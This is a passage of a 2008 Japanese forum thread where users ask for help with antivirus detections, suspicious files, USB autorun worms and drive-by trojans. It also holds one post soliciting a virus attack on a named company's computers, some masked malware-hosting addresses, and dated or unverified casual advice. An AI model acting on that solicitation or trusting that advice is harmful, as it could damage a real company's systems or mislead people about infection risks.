68:名無しさん@お腹いっぱい。
08/11/08 15:22:57
>>67
返信ありがとうございます
やはりゲームに関係してたのですね
これで対象外にできます

69:名無しさん@お腹いっぱい。
08/11/08 15:59:22
f.exe

70:名無しさん@お腹いっぱい。
08/11/09 17:27:55
【使用OS】 「windows VISTA HOME PREMIUM」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「AVG」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「トロイの木馬generic12.HNC」 ファイルパス C:\Program Files\VistaCodecPack\Tools\233.exe

たった今PC起動後すぐにウイルスが検出されたとメッセージが出て「この脅威の強制削除を行いますか?」  
という問いかけの下に 「はい」と「いいえ」のボタン、
そして(赤字で)「強制除去によりシステムが不安定になったかあるいはクラッシュしました」とメッセージが出ています。

また該当のファイルのプロパティを見てみると

ファイルの種類 アプリケーション(exe)
説明   233
作成日時 2007?年?10?月?19?日、??0:15:45
アクセス日時 2007?年?12?月?27?日、??19:01:51

とあり同じtoolsフォルダに「238」というファイルと
「reset」
ファイルの種類 アプリケーション(exe)
説明 new user account Setup

作成日時  2007?年?11?月?16?日、??10:58:36
アクセス日時 ?2007?年?12?月?27?日、??19:01:52

という計3つのファイルがあります。
ウイルス名を検索しても何も情報がないのでどうしたらいいか分からず不安です。
何かアドバイスがあればよろしくお願いします。

71:名無しさん@お腹いっぱい。
08/11/09 20:12:12
【使用OS】 「xp pro sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「ウィルスバスター2007の機能を使用」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「TROJ_STARTPA.DS」
「C:\WINDOWS\system32\taskmagr.exe」
URLリンク(www.trendmicro.co.jp)

トレンドマイクロの該当ページを見ても削除方法が載っていないので、教えてください。

72:名無しさん@お腹いっぱい。
08/11/09 20:41:38
>>71
スペルは合っているか?
taskmgr.exeではなくtaskmagr.exeなんだな?
スタートページを書き換えるタイプのようだから
スタートページが書き換えられていないか確認。
自動実行されるようになっていないか確認。
「お気に入り」に書き足すやつもあるみたいだから、
ついでに「お気に入り」も確認しておこう。
その後該当ファイルを削除すればよいかと。

73:72
08/11/09 20:55:00
さらに「信頼済みサイト」に変な物が追加されてないかも確認しておこうか。

74: ◆0fQkHdNop2
08/11/09 20:59:44
>>70
とりあえず、VirusTotalで検査したら?
URLリンク(www.virustotal.com)

75: ◆0fQkHdNop2
08/11/09 21:04:03
>>71-72
そう言えば、数日前、taskmgr.exeではなくtaskmagr.exeがあるという者が
いたような気がする。どのスレだったか忘れたが。


76: ◆0fQkHdNop2
08/11/09 21:09:38
初心者スレだった。
スレリンク(sec板:73番)n-75
73 :名無しさん@お腹いっぱい。:2008/11/04(火) 06:37:16
すみません、みなさんのXPのsystem32内に「taskmagr.exe」というバージョン情報タブがないexeはあります?
「taskmgr.exe」ではなく「taskmagr.exe」です。

77:71
08/11/09 21:41:05
>>72
あら、スペル間違えてましたね。
taskmagr.exe でOKです。

スタートページもお気に入りも信頼済みサイトも何も異常無しなんですよ。
それでもウイルス検出されるんです。

それと、具体的な削除方法を教えてください。
system32から該当ファイルを削除しようとしても出来ないんです。
プロセスを終了させることも出来ません。

78: ◆0fQkHdNop2
08/11/09 21:54:44
>>77
安全確実にリカバリ。
VirusTotal検査結果↓
URLリンク(www.virustotal.com)

Startpageとかスパイウェアみたいな名前ついてるのもあるね。

79:72
08/11/09 22:02:37
>>77
初心者ではないのだろう?少し冷静になろう。
削除できないということは実行中なのだろう。
じぶんで起動していないなら自動実行されているのだろう。
だから「自動実行」するように設定されていないか確認しよう。

80:71
08/11/09 22:45:55
>>78-79
いろいろとアドバイスありがとうございました。
無事削除出来ました。

セーフモードから削除するという初歩的?なことを忘れていました。
何年振りかの感染だったので忘れていたようです。
ご迷惑おかけしました。

81:名無しさん@お腹いっぱい。
08/11/09 23:53:09
質問なんですが最近でも山田ウィルスの亜種(ウィルス対策ソフトには引っ掛からない)は出ているんでしょうか?
それともほとんどの山田ウィルスは対策ソフトで対策対応済みですか?

82:名無しさん@お腹いっぱい。
08/11/10 01:33:08
出てない。
対応済み。

83:名無しさん@お腹いっぱい。
08/11/10 04:30:16
>>76
その>>73て俺なんだけど実はまだ格闘中なんだw
よく調べたらどんどんトロイが出てきて「OSインストールして一週間でなぜ・・・」
といろいろ検索してたらさっき↓を見つけた。
URLリンク(www.avpclub.ddns.info)
実際俺はFlashGetを入れてるしソフ板のFlashGetスレでもチョロっと話しが出てたから
多分ビンゴだと思うんだけど。もうちょい調べてみる。

84:名無しさん@お腹いっぱい。
08/11/10 19:25:58
DrWebが対応してるみたいだから
Dr.Web CureIt!でも落としておけば?

FlashGetは以前のバージョンでスパイウエア疑惑があったが
今もそんな噂があるのか?

85:名無しさん@お腹いっぱい。
08/11/10 21:04:19
最近は聞かないな。
自分も数ヶ月前に入れてた(使えないからすぐ消した)けど何もなかった。

86:名無しさん@お腹いっぱい。
08/11/11 11:25:03
>>83

たぶんビンゴですね。うちも同じ症状です。FlashGet Version 1.9.6.1073導入済。
定期的にアップされるファイルをダウンするために毎日バッチでFlashGetを動かしだしてから。
10/4  sprint.dll
10/25 dmsvct.dll
10/25 xmlpro.dll
11/7  dmserv.dll
いずれもC:\WINDOWS\system32\にあるのをNortonが発見、検疫されました。
で、きょうカスペルスキー オンラインスキャナかけたらtaskmagr.exe見つけました。
ご丁寧にほかのwindowsシステムファイルと日時あわせてあります。
状況証拠だけで、クロと決まったわけではありませんが、疑わざるを得ません。
バッチ機能、便利だったんですが残念ですね。気持ち悪いのでOSごと再導入します。

87:名無しさん@お腹いっぱい。
08/11/11 17:20:00
URLリンク(internet.watch.impress.co.jp)
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?

88:名無しさん@お腹いっぱい。
08/11/11 22:47:24
188 名無しさん@お腹いっぱい。 mail:sage  2008/11/11(火) 17:16:09

URLリンク(internet.watch.impress.co.jp)
この記事にあるようにwmvを再生しようとしたら
メディア使用権限取得しますってなって
UPDATE.3397ダウンロード
インストールしたらスカイプにてなぞの英語文章が勝手に書き込まれるように
なったんだけど他になった人いる?

89:名無しさん@お腹いっぱい。
08/11/12 00:08:07
山田ウィルスなんですが、hostファイルのlocalhostに127.0.0.1以外のIPアドレスがあれば感染している可能性とあるんですが、
127~の下の行に::1と書かれています。これはウィルスでしょうか?それとも、問題ありませんか?

90:名無しさん@お腹いっぱい。
08/11/12 00:20:35
激しく板違い。
割れ厨に教えることは何もありません。



91:名無しさん@お腹いっぱい。
08/11/12 00:29:51
>>89
ここを参考
URLリンク(www.geocities.jp)

>>90
勝手に割れ厨って決めつけるなよwお前と違うんだからww



92:名無しさん@お腹いっぱい。
08/11/12 01:31:25
テンプレ補足

P2P(Winny、Share、etc.)ウイルス(キンタマ、山田、原田、etc.)は板違い。移動しろ。
P2P以外(アップローダ、etc.)で踏んだとしても移動しろ。
Download
URLリンク(changi.2ch.net)
キンタマ、山田、ニュイルスなどでスレ探せ。

93:名無しさん@お腹いっぱい。
08/11/12 02:05:26
圧縮されてるファイル(ウイルス入り)は
マウスオーバーとか移動させたりしただけで感染しますか?

94:名無しさん@お腹いっぱい。
08/11/12 02:22:23
問題ない。


95:名無しさん@お腹いっぱい。
08/11/12 02:31:53
>>94
thx

96:名無しさん@お腹いっぱい。
08/11/13 00:40:20
Celeron433、メモリ512MB、Windows2000のPCに
アンチウイルスとアンチスパイウェアを入れたいのですが、
オススメがあれば教えてください。

97:名無しさん@お腹いっぱい。
08/11/13 01:11:04
【使用OS】 XP Home SP2
【使用ブラウザ】  Internet Explorer 6

HDD内をいろいろ見てたら
「TEMP」の中にIE5のデータが残ってるみたいなんですが
これって消去しても問題あにでしょうか?
というか、「TEMP」の中のファイルを全部消しちゃっても大丈夫でしょうか?

98:名無しさん@お腹いっぱい。
08/11/13 05:48:08
父があるアーティストの曲が聴きたいといっていたので
父のフラッシュメモリを借りてそこに曲を入れてやろうと思い、恥ずかしながらp2pソフトで曲をダウンロードしました
wmpで再生しようとすると、mp3の形式が違う云々と出てきたのですが、アイコンがmp3のものだったので無視してしまいましたところ
急にIEが開きmp3.exeという名のダウン窓が出てきたのでダウンロードせず閉じたのですが
この時点でウイルスには感染しないのでしょうか
父のフラッシュメモリを挿したままのことだったので
父がまだ仕事をしており、父のPCの情報が漏洩しないかとても不安です

携帯からで変な文かと思いますが宜しくお願いします

99:名無しさん@お腹いっぱい。
08/11/13 05:53:24
>>98
テンプレ嫁
ここはそういう質問スレじゃないから

100:名無しさん@お腹いっぱい。
08/11/13 06:11:29
移動します
すいませんでした

101:名無しさん@お腹いっぱい。
08/11/13 22:55:16
俺も今タククマネージャ見たらtaskmagr.exeがいた
確かにここ何日かにFlashget入れてたな
うーんこれさえなければ悪いソフトじゃないんだが
ノートン先生が無反応なとこ見るとウィルスではないんだろうか
でも名前がめっちゃウィルスっぽい

102:名無しさん@お腹いっぱい。
08/11/13 22:59:54
( ´_ゝ`)

103:名無しさん@お腹いっぱい。
08/11/13 23:12:56
というかノートンが糞なのか
ひょっとして

104:名無しさん@お腹いっぱい。
08/11/14 16:19:24
今頃気づいたのか?

105:名無しさん@お腹いっぱい。
08/11/16 02:53:31
ウィルスについての質問なんだけど。
Trojan.Generic.1007377ってどんなウィルスなんだ?
Bitdeffenderを使って調べたところ見つけたんだが、ググっても出てこない。

106:名無しさん@お腹いっぱい。
08/11/16 02:57:32
スペル間違えた
BitdeffenderでなくてBitdefenderだった

107:名無しさん@お腹いっぱい。
08/11/16 04:12:28
>>105
検出されたファイルをVirusTotalに上げて他社の検出名でググってみたら?

108:名無しさん@お腹いっぱい。
08/11/16 04:43:51
>>107
同意
Genericだから、ヒューリの可能性が高いし

109:名無しさん@お腹いっぱい。
08/11/16 05:52:45
まずVirus Totalで調べたところ、44.45%になった。
以下、検出結果。
AntiVir 7.9.0.31    TR/Crypt.XPACK.Gen
Avast 4.8.1281.0    Win32:Trojan-gen {Other}
AVG 8.0.0.199     SHeur.CDNZ
BitDefender 7.2 Trojan.Generic.1007377
CAT-QuickHeal 10.00 (Suspicious) - DNAScan
eSafe 7.0.17.0 Suspicious File
Ikarus T3.1.1.45.0 Trojan.Crypt.XPACK
GData 19 Trojan.Generic.1007377
K7AntiVirus 7.10.526 Trojan.Win32.Malware.1
McAfee 5435 Generic.dx
Norman 5.80.02 W32/Malware.EEGT
Panda 9.0.0.4 spicious file
SecureWeb-Gateway 6.7.6 Trojan.Crypt.XPACK.Gen
Sophos 4.35.0 Mal/EncPk-CR
Sunbelt 3.1.1801.2 VIPRE.Suspicious
TrendMicro 8.700.0.1004 PAK_Generic.001

他は検出していない。
これってウィルスなんだろうか?

110:名無しさん@お腹いっぱい。
08/11/16 06:01:23
半角スペース使ったため隙間が省略されてしまった。
かなり見づらくなってるから再度。
AntiVir 7.9.0.31        TR/Crypt.XPACK.Gen
Avast 4.8.1281.0        Win32:Trojan-gen {Other}
AVG 8.0.0.199          SHeur.CDNZ
BitDefender 7.2        Trojan.Generic.1007377
CAT-QuickHeal 10.00      (Suspicious) - DNAScan
eSafe 7.0.17.0         Suspicious File
Ikarus T3.1.1.45.0       Trojan.Crypt.XPACK
GData 19            Trojan.Generic.1007377
K7AntiVirus 7.10.526      Trojan.Win32.Malware.1
McAfee 5435           Generic.dx
Norman 5.80.02         W32/Malware.EEGT
Panda 9.0.0.4          spicious file
SecureWeb-Gateway 6.7.6     Trojan.Crypt.XPACK.Gen
Sophos 4.35.0          Mal/EncPk-CR
Sunbelt 3.1.1801.2       VIPRE.Suspicious
TrendMicro 8.700.0.1004     PAK_Generic.001

111:名無しさん@お腹いっぱい。
08/11/16 06:21:38
これだけ検出されると可能性は高いんじゃない?
ベンダにファイルを提出すれば検査結果を教えてくれるよ。

112:名無しさん@お腹いっぱい。
08/11/16 12:57:08
ありがとう。
ベンダに提出してみます。

113:名無しさん@お腹いっぱい。
08/11/16 17:42:43
CとDがクリックで開かなくなった…
スクリプトファイルが見つかりませんって…

114:名無しさん@お腹いっぱい。
08/11/18 09:43:22
AVGバージョン8で、generic10.caqというウィルスが検出されました。
対処はできたんですが、このウィルスがどんなものなのかググってもわかりません。
AVGの指示通り処理すれば大丈夫ですかね?

115:114
08/11/18 09:46:02
ググったら、「ca」はあったのですが「caq」はヒットしなかった、ということです。


116:名無しさん@お腹いっぱい。
08/11/18 09:51:50
名前なんてアンチウイルスによってバラバラなんだから
AVGスレで聞けば?

117:名無しさん@お腹いっぱい。
08/11/19 20:29:07
>>114
genericでぐぐれうんこ

118:名無しさん@お腹いっぱい。
08/11/20 04:44:03
アルボッキ性膜ってスレにあるアルバック成膜㈱の糞会社のPCにウィルス贈呈したいんだけど誰かやっちゃってくれません?
あんな会社目障りなので無くなってほしいんです
会社のPCとかに潜り込んで目茶苦茶にしたいんですが出来ませんかねぇ

119:名無しさん@お腹いっぱい。
08/11/20 08:23:58
>>118
その程度の頭じゃ無理

120:名無しさん@お腹いっぱい。
08/11/20 12:27:32
IPアドレスの認証や確立を妨げるウイルスってありますか?
常接なんですが、ヤケにDLに時間のかかるメールを受信した後、
PCを再起動したらIPアドレスの確立と認証ができなくなっていました。
ハード的にはLANを認識しているみたいです。

121:↑
08/11/20 12:29:20
ほぼ同時に3台やられたんで、泣き…です。

122:名無しさん@お腹いっぱい。
08/11/20 14:44:51
男性俳優板行くとカスペが反応するんだけどなにこれ。
URLリンク(u.cruze3.cn)
トロイの木馬っつーんだけどほんと?

123:名無しさん@お腹いっぱい。
08/11/20 14:57:27
直リンするんじゃねーよ。
FlashPlayerの脆弱性を使うトロイだな。
9.0.124未満ならあぼん。

124:名無しさん@お腹いっぱい。
08/11/20 14:58:40
ごめん。

>9.0.124未満ならあぼん。

そうなんだ。
つーか2chのあちこちの板にしかけられててこわひ。。

125:名無しさん@お腹いっぱい。
08/11/20 15:06:46
URLリンク(u.cruze3.cn)
URLリンク(u.cruze3.cn)
あとこれもついてきた。

2ch開くだけでなんでこんなウィルスついてくんの?

126:名無しさん@お腹いっぱい。
08/11/20 15:07:56
ググッても出てこないし。
こえー。

127:名無しさん@お腹いっぱい。
08/11/20 15:08:03
そのサイトの調査結果
URLリンク(www.aguse.jp)
検出されたマルウェアの詳細
URLリンク(www.f-secure.co.jp)

URL直に貼るな粕。

128:名無しさん@お腹いっぱい。
08/11/20 15:09:15
>>125
板開いてもそんなの無いぞ。
ブラウザのキャッシュ壊れてんじゃね?

129:名無しさん@お腹いっぱい。
08/11/20 15:21:18
>>128
www.proxylist.sakura.ne.jp
これ開いたらだった
ごめん

男性俳優板じゃなかった。スマソ

130:ナイトウォッチ
08/11/20 16:14:17
ガイシュツかも・・・
無料でウィルス検索できるサイト教えてください。
パソコンまだなれてなくて・・
メールを送ったらおかしくなったっていわれてウィルスかな?と思って

131:名無しさん@お腹いっぱい。
08/11/20 17:48:30
>>130
なんでアンチウイルスソフト入れないの?
馬鹿なの?

132:ナイトウォッチ
08/11/20 19:20:01
小さい会社のパソコンで入ってないみたいなんですよね;;
ノートンいれます。

133:名無しさん@お腹いっぱい。
08/11/20 22:04:58
>>132
ほらよ
スレリンク(sec板)l50

134:【来週強行・革命成立?】最凶の国籍法改正案
08/11/21 01:10:28
【来週強行・革命成立?】最凶の国籍法改正案 vs 最強のFAX凸撃 01/18
URLリンク(jp.youtube.com)
URLリンク(jp.youtube.com)   02/18
URLリンク(jp.youtube.com)   03/18
URLリンク(jp.youtube.com)   04/18
URLリンク(jp.youtube.com)   05/18
URLリンク(jp.youtube.com)   06/18
2時間目
URLリンク(jp.youtube.com)   07/18
URLリンク(jp.youtube.com)   08/18
URLリンク(jp.youtube.com)   09/18
URLリンク(jp.youtube.com)   10/18
URLリンク(jp.youtube.com)   11/18
URLリンク(jp.youtube.com)   12/18
3時間目
URLリンク(jp.youtube.com)   13/18
URLリンク(jp.youtube.com)   14/18
URLリンク(jp.youtube.com)   15/18
URLリンク(jp.youtube.com)   16/18
URLリンク(jp.youtube.com)   17/18
URLリンク(jp.youtube.com)   18/18

135:名無しさん@お腹いっぱい。
08/11/21 07:19:25
ツマンネ

136:名無しさん@お腹いっぱい。
08/11/21 08:44:56
>>134
つまんねー

137:名無しさん@お腹いっぱい。
08/11/22 22:53:38
【使用OS】  『XP pro 2002 sp3』 
【使用ブラウザ】  『IE6』
【Microsoft Updateの更新の状態】  『自動更新設定』
【セキュリティソフトと年式】   『ウィルスセキュリティZero』
スパイウェア・ボット対策ソフト 『無』

【回線の種類・ルータの有無】  『ADSL マンション』

【具体的な症状】
突然しねしね団Flashが再生される。
DLした覚えはないです。
画面が閉じれない
【過程と措置】強制終了→起動→ウイルス検査
【その他】 海外赴任(インドネシア)の日本人です。
突然フラッシュが「死ね死ね 日本人」と始まり
身の危険も感じております。恨みを買われる覚えもあります。

どうかアドバイスお願い致します。

138: ◆N9P3SuvBPo
08/11/23 00:25:30
>137
セキュ質で回答が得られなかったとはいえ、マルチするのは良くありませんよ。
焦らずじっくり待ってみましょ。

139:名無しさん@お腹いっぱい。
08/11/23 13:24:30
URLリンク(koideai.com)
アドレスはPCの状態の画像です
検索したけどよくわかりません・・・
バスターで反応しなかったからウィルスじゃないのかな
このツールバーがサイトまわってたら知らないうちに入ってて
アンインストールしようとしても変なサイトに飛ばされそうになって
恐ろしくて途中で中断してしまいます

詳しいこと知ってる人これが一体何なのか教えてください・・・;

140:名無しさん@お腹いっぱい。
08/11/23 14:26:51
「Pirate Bay」っていうBit Torrentのファイル検索エンジンのツールバーみたい。
普通にアインストールしても大丈夫じゃない?
どっかにのサイトに飛ばされるのが嫌なら
FWの方でアンインストールする時だけIEのネットワーク接続を遮断すればいいし。

まぁ、これに懲りたらブラウザを変えることですな。

141:名無しさん@お腹いっぱい。
08/11/23 21:24:09
なぜかさっきの画像が出会い系に飛ぶようになっとる・・・
ウィルス関係ではないんですね
それが聞けただけでも安心できます!
とりあえず消してきます

142:名無しさん@お腹いっぱい。
08/11/26 00:21:52
PCを起動すると勝手に音楽が始まる…。
しかも中国語とかのラップ。気持ち悪いです。
これはウィルスですか?

143:名無しさん@お腹いっぱい。
08/11/26 00:54:25
俺のじゃないから問題なし
安心して寝な

144:名無しさん@お腹いっぱい。
08/11/27 00:12:42
>>142
勝手にieがコッソリ立ち上がる奴だろ?俺も同様な症状だ
極論だがieをアンインストールしてFirefoxらへんを使えば一応解決するとは思うが・・・
ウイルス対策ソフトの対応待ちか?

145:名無しさん@お腹いっぱい。
08/11/27 18:33:12
>>142
俺も同症状だ。
IEをアンインストールで解決するの?

146:名無しさん@お腹いっぱい。
08/11/27 20:15:56
とりあえずIEをリネームして様子見してはどうか

147: ◆N9P3SuvBPo
08/11/27 20:52:45
>142
たぶん無意味かと思うけど、
音楽が始まったらタスクマネージャを起動させて、怪しいプロセスが動いてないか確認してみて。

148:名無しさん@お腹いっぱい。
08/11/27 21:42:24
>>142
Anvir Task Manager Freeを使って、スタートアップサービスプロセスの怪しいものを全て
Virustotalに投げてみれば?
ちなみに最近Languageに日本語も追加された(多少文字化けあり)。
URLリンク(www.anvir.com)

149:名無しさん@お腹いっぱい。
08/11/27 22:46:58
【使用OS】   XP Home SP2
【セキュリティソフトと年式】 ウイルスバスター2009 
【スパイウェア対策ソフト】  同上

【回線の種類・ルータの有無】 ADSL ルーター有

【具体的な症状】 
手動検索を先日かけたところ、『TROJ_MESOUM.AE』というウイルスに感染していると言う通知を受け、隔離したのですが
隔離フォルダから駆除を試したところ、駆除ができませんでした。
削除していいものかよくわからないので、感染していたファイル名を検索していたらこちらを拝見させていただいたので
相談したくて書き込みをさせていただきました。

どうしたらよいのでしょうか?

感染したファイルは
C\WINDOWS\system32\msGDl1.dllです

よろしくお願いいたします。

150:名無しさん@お腹いっぱい。
08/11/28 01:57:39
>>142です!

みなさん、親切にありがとうございます。
音楽が流れてもIEが勝手に起動とかはしてないです。
でも、タスクマネージャーのプロセスを確認したら、IEが動いてました。
(画面上では起動されてません)
そしてCPU稼動率が100%になってました。
みなさんに教えてもらったことを試してみますね!
また結果報告に来ます。

ちなみに、音楽はかからない時もあります。
急にかかったり、繰り返しかかったり、一度で終わる時もあります。

151:名無しさん@お腹いっぱい。
08/11/28 12:45:25
スレイプニルでネット巡回中、突然「こんにちは!こんにちは!」というポップアップ表示がでてきました。
これは最近流行のウィルスだったりします?

152:名無しさん@お腹いっぱい。
08/11/28 12:46:23
ああ、やばいな

153:名無しさん@お腹いっぱい。
08/11/28 14:26:46
はまちちゃんだな

154:名無しさん@お腹いっぱい。
08/11/29 02:54:11
ルックルックこんにちはだな

155:名無しさん@お腹いっぱい。
08/11/29 10:39:11
USBをさしたらウイルスソフトの反応があってRECYCLERというフォルダとAutorun.infがありました
一応、USBの中のそのフォルダとファイルは削除してPCはシステムの復元をしました
するべき対処として他になにかするべきことはありますか?
OS初期化したほうがいいでしょうか?

156: ◆0fQkHdNop2
08/11/29 12:08:36
>>155
USBによる自動実行ウィルス(USBワーム)でしょうけど、ウィルス対策
ソフトが検知したので、少なくともそのUSBワーム本体の実行前に防御して
くれてるはずです。
ただし、可能性は低いですが、防御が攻撃の自動実行司令ファイル
「autorun.inf」読み込み後でそのUSBワーム本体実行前になされた場合で、
しかも、そのUSBワーム本体以外にウィルス対策ソフトに未反応の別の
ウィルスや攻撃コード等が他にあった場合にはウィルス対策ソフトが
防ぎきれてない事があります。
しかし、その場合でも、システムの復元したので、削除もしくは休眠状態
になってるはずなので、そういう場合でも一応は大丈夫でしょう。
ただし、システムの復元前にネット接続してた場合には、ウィルス対策
ソフト未対応の別のウィルスや攻撃コードが他にあった場合に備えて
パスワード変更を推奨します。また、システムの復元の感染後の復元
ポイントにはUSBワームが含まれているので、システムの復元を
一旦無効にして、その後、再度有効にしてください。(方法が
わからない場合は自分で調べてください。)

尚、そのパソコンに重要機密とか大金のからむパスワードとか流出すると
人生破滅するような情報があれば、万が一を考えて自己責任でリカバリ
するか否かを考慮してください。

また、USBワームの感染経路も調べる事を推奨します。

157: ◆0fQkHdNop2
08/11/29 12:28:57
>>155
今後の事を考えて自動再生をオフにされる事を推奨します。
URLリンク(windowshelp.microsoft.com)

158:名無しさん@お腹いっぱい。
08/11/29 17:32:02
>>156
ありがとうございます。
システムの復元をしたところ今度はwindowsがまともに起動しなくなりました。
とりあえず復元前に戻しましたが、もうリカバリしようかと思います。

159:名無しさん@お腹いっぱい。
08/11/29 18:44:02
その方が賢明だねw

160:名無しさん@お腹いっぱい。
08/12/04 17:13:06
ウィルスバスターがウィルスの定義ファイル更新したら
リアルタイム検索つけてるとBeckyが繋がらなくなったぜ
氏ね

161:名無しさん@お腹いっぱい。
08/12/04 17:24:04
リアルタイム検索にある

受信メール検索
送信メール検索

を切ったらOKになった
氏ね

162:名無しさん@お腹いっぱい。
08/12/04 22:26:57
>>142さん
その後の状況はどうですか。
同じ症状が出ました。

163:名無しさん@お腹いっぱい。
08/12/04 22:46:23
>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>162さんはいれてないですか?

164:162
08/12/04 22:47:45
↑ミスったので修正…
>>162さんと同じく自分もその症状が出た。
最近いれたflashgetのせいかなって思っていますが…
>>162さんはいれてないですか?

165:名無しさん@お腹いっぱい。
08/12/05 01:02:26
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?

166:名無しさん@お腹いっぱい。
08/12/05 02:19:42
セキュリティ初心者質問スレッドpart114
スレリンク(sec板:784番)

784 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/05(金) 01:04:18
最近MS02-039_SQL_SERVER_RESOLUTION_EXPLOITというウイルスを緊急ブロックしましたという警告が
2時間おきくらいに出て困っています
セキュリティ的には防いで問題ないそうですが、そのたびネット接続が途切れるので
何か改善策はありませんか?

167:名無しさん@お腹いっぱい。
08/12/05 12:38:59
>>142です!
報告が遅くなりすみませんでした。
IEを削除し、再インストールしました。
その後、2日経っていますが音楽は鳴らなくなりました!
みなさんありがとうございました!

168:名無しさん@お腹いっぱい。
08/12/05 13:49:11
名前:(c) C:\WINDOWS\system32\dmserver.dll
脅威の名称: (D)W32/Patcher
状態:(E) 1025  
パソコンを使っていたらこのようなメッセージが表示されました。
グーグルで調べても詳しいことはよく分かりません。
このウイルスは、一体どのような性質を持っているのか、
また、どれくらい危険なウイルスなのかを教えていただけないでしょうか。
お願いします。
使っているセキュリティーソフトはマカフィーです。
最近行った作業は、
SpywareBlasterやRPGツクールの無料ゲームとランタイムをダウンロードです。


169:名無しさん@お腹いっぱい。
08/12/05 16:12:30
virustotalに投げてみれば?

170:名無しさん@お腹いっぱい。
08/12/05 17:23:21
>>162
それってサウンドがいじられてるだけじゃないの?
Windowsの開始時の音をそのWAVだかMP3だかにされてるとか

171:名無しさん@お腹いっぱい。
08/12/05 20:55:27
ampfrb.cmdって何ですか?
ドライブ全部にあるんですけど。

172:名無しさん@お腹いっぱい。
08/12/05 21:01:35
>>142さん
162です。
報告ありがとうございます。
IE8削除してIE7に戻してみました。
暫く様子をみてみます。

173:名無しさん@お腹いっぱい。
08/12/06 07:37:49
>>164さん
162です。
flashgetはかなり前から入れてますから関係無いと思います。

174:名無しさん@お腹いっぱい。
08/12/06 16:13:52
【使用OS】 「XP home sp2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてます」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「されてます」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
C:WINDOWS\system32\taskmagr.exe
さきほどPCを立ち上げたところ、上記のファイルから
TROJ_AGENT_APXというトロイが見つかりました、と表示され
ウィルスバスターで隔離しましたが、トレンドマイクロにも上記トロイの情報は無く
駆除ができません。
どのようなウィルスかもわからず不安です。今後どのように対処すべきでしょうか?

175:名無しさん@お腹いっぱい。
08/12/06 17:06:13
ウイルスの命名はベンダーでばらばらなんだから
トレンドマイクロの検出名はトレンドマイクロにしかわからんだろ。
バスタースレで。

176:名無しさん@お腹いっぱい。
08/12/06 18:46:58
>>174
隔離できてるなら問題ないのでは?


177:名無しさん@お腹いっぱい。
08/12/06 20:34:09
>>173
返答有難うございます。
以前からいれられてるんですね。
flashget入れてから頻繁にウイルスが見つかったもので…
なにやらflashgetを起動させると頻繁に中国のサイトにアクセスしていたりしたので。

178: ◆N9P3SuvBPo
08/12/06 22:03:27
>177
その中国のサイトを教えてくださいな。
あ、頭のhtは抜いて。

179:名無しさん@お腹いっぱい。
08/12/07 00:03:33
中華製のスパイウェアソフトを入れるほうが悪い
いますぐアンインストールしろよ
中華製のソフトは使わないことだな

180:名無しさん@お腹いっぱい。
08/12/07 01:34:54
↑バスター使い

181:名無しさん@お腹いっぱい。
08/12/07 03:26:00
>>178
詳しくは分かりませんが、
PeerGuardian2で動向を監視したところ、
China IP
China Education and Research Network
fake emule servers
(Spam) ServerBeach
等が頻繁にブロックされていました。
尚、flashgetを終了すると↑へのアクセスは止まりました。

182:名無しさん@お腹いっぱい。
08/12/07 03:30:54
ほい。
URLリンク(www.shareedge.com)

183:名無しさん@お腹いっぱい。
08/12/07 08:23:06
flashgetのバージョンが古くないか

184:名無しさん@お腹いっぱい。
08/12/07 12:29:25
>>182
自分でもすぐ調べては見たのですが、
やはりスパイウェア仕込んでることで有名みたいですね。
なにか、いつかのバージョンから無くなったとか書いてあったのですが…

>>183
VectorでダウンロードしたFlashGet1.9.6です。


185:名無しさん@お腹いっぱい。
08/12/07 18:21:11
A.状況
【使用OS】 「Xp SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「AVG Free 8.0」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新されている」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「無」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「(1)ファイルをコピーしようとしたら、次のメッセージが表示された
   アクセスしたファイルは感染しています。
   ファイル名:C\System Volume Information\_restore{667B7FC2-A2DB-4c51-9B6c-1A4ECAE5387C}\RP295\A0038262.exe
脅威名:トロイの木馬 PSW.OnlineGames.2.S
       オープン時に検出されました
   処理名:C\WINDOWS\System32\svchost.exe
処理ID:1320
(2)スキャンしたら、
a.上記ファイル名の最後が次のものが5件表示され、
     A0038268.exe 1件
     A0038262.exe 3件
     A0039185.exe 1件
   b.その後、次のメッセージが表示された
     D:\System Volume Information\_restore\_restore{667B7FC2-A2DB-4C51-9B6C-1A4ECAE5387C}\RP295\A0038211.exe
c.最後に、
     検出された感染 66
除去または修復された感染オブジェクト 66
警告数 70
その他 0


186:185(続き)
08/12/07 18:22:29
 (3)USBメモリーをコマンドプロンプトでattrib表示すると
    SHR autorun.inf SHR f.exeが表示される。
